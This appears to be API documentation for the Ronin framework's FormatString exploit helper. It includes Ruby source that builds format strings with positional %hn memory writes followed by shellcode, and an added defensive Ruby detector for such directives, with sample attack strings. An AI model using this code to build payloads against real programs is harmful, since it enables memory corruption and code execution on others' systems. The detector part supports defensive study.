Module: Ronin::Exploits::Helpers::FormatString
- Defined in:
- lib/ronin/exploits/helpers/format_string.rb
Overview
Adds methods to exploits for generating format strings to be used in format string vulnerabilities.
Target Parameters
The format string helper uses the following target parameters:
- overwrite
- pop_length
- address
Payloads
Uses the Payloads::Shellcode payload by default.
Instance Attribute Summary
- #format_string ⇒ Object
  The format string of the exploit.
Class Method Summary
Instance Method Summary
- #build_format_string ⇒ String (protected)
  Builds a format string using the current target and payload to be used in the format string exploit.
- #payload_class ⇒ Class
  Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.
- #test_target! ⇒ true
  Tests the selected target and checks that it contains the overwrite, pop_length and address target parameters.
Instance Attribute Details
#format_string ⇒ Object
The format string of the exploit.
    # File 'lib/ronin/exploits/helpers/format_string.rb', line 46
    def format_string
      @format_string
    end
Class Method Details
.extended(obj) ⇒ Object
    # File 'lib/ronin/exploits/helpers/format_string.rb', line 48
    def self.extended(obj)
      obj.instance_eval { helper :binary }
    end
Instance Method Details
#build_format_string ⇒ String (protected)
Builds a format string using the current target and payload to be used in the format string exploit.
    # File 'lib/ronin/exploits/helpers/format_string.rb', line 105
    def build_format_string
      test_target!

      buffer = pack(target.overwrite) + pack(target.overwrite + (target.arch.address_length / 2))

      low_mask = 0xff
      (target.arch.address_length/2).times do
        low_mask <<= 8
        low_mask |= 0xff
      end

      high_mask = low_mask << (target.arch.address_length*4)
      high = (target.address & high_mask) >> (target.arch.address_length/2)
      low = target.address & low_mask

      if low < high
        low -= (target.arch.address_length*2)
        buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1)
      else
        high -= (target.arch.address_length*2)
        buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length)
      end

      buffer << raw_payload
      return buffer
    end
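For defenders, the string this method emits has a recognizable shape: padded conversions followed by positional `%hn` writes. The following is an added example, not part of Ronin, that flags such directives in untrusted input; `SPEC`, `scan_directives` and `assess` are hypothetical names and the sample strings are constructed.

```ruby
# Added example (not Ronin code): flag printf-style write directives in
# untrusted input before it can reach a printf-family call.

# One conversion spec: %[pos$][flags][width][.precision][length]conv
SPEC = /%(?:(\d+)\$)?[-+ 0'#]*(\*|\d+)?(?:\.(\*|\d+))?(hh|h|ll|l|j|z|t|L)?([diouxXeEfFgGaAcspn%])/

# Parse every conversion spec; "%%" is a literal percent and is dropped.
# input.b forces binary encoding so packed address bytes do not break matching.
def scan_directives(input)
  input.b.scan(SPEC).map do |pos, width, prec, len, conv|
    next if conv == "%"
    { position: pos && pos.to_i,             # N in %N$..., nil if not positional
      pad: [width.to_i, prec.to_i].max,      # output padding requested by the spec
      length: len, conv: conv }
  end.compact
end

# Summarise what the input would make printf do if used as a format string.
def assess(input)
  specs  = scan_directives(input)
  writes = specs.select { |s| s[:conv] == "n" }   # %n stores the output count
  verdict = if writes.any? then :write            # memory write primitive
            elsif specs.any? then :read           # stack/heap disclosure at most
            else :clean
            end
  {
    verdict: verdict,
    write_positions: writes.map { |s| s[:position] },
    short_writes: writes.count { |s| %w[h hh].include?(s[:length]) },
    max_padding: specs.map { |s| s[:pad] }.max.to_i
  }
end

# Constructed samples. The first has the shape build_format_string emits:
# two packed addresses (placeholder bytes here), then two padded %hn writes.
SAMPLES = [
  'AAAACCCC%.4660d%7$hn%.17185d%8$hn',
  'user=%s id=%08x',
  'disk 100%% full'
]

SAMPLES.each { |s| puts "#{assess(s)[:verdict]}\t#{s.inspect}" }
```

The conversion list is limited to standard printf conversions, so URL-encoded text such as `%20` followed by a letter outside that list is not reported.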
#payload_class ⇒ Class
Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.
    # File 'lib/ronin/exploits/helpers/format_string.rb', line 61
    def payload_class
      Payload::Shellcode
    end
#test_target! ⇒ true
Tests the selected target and checks that it contains the overwrite, pop_length and address target parameters.

    # File 'lib/ronin/exploits/helpers/format_string.rb', line 78
    def test_target!
      super

      unless target[:overwrite]
        raise(TargetDataMissing,"target missing the 'overwrite' param")
      end

      unless target[:pop_length]
        raise(TargetDataMissing,"target missing the 'pop_length' param")
      end

      unless target[:address]
        raise(TargetDataMissing,"target missing the 'address' param")
      end

      return true
    end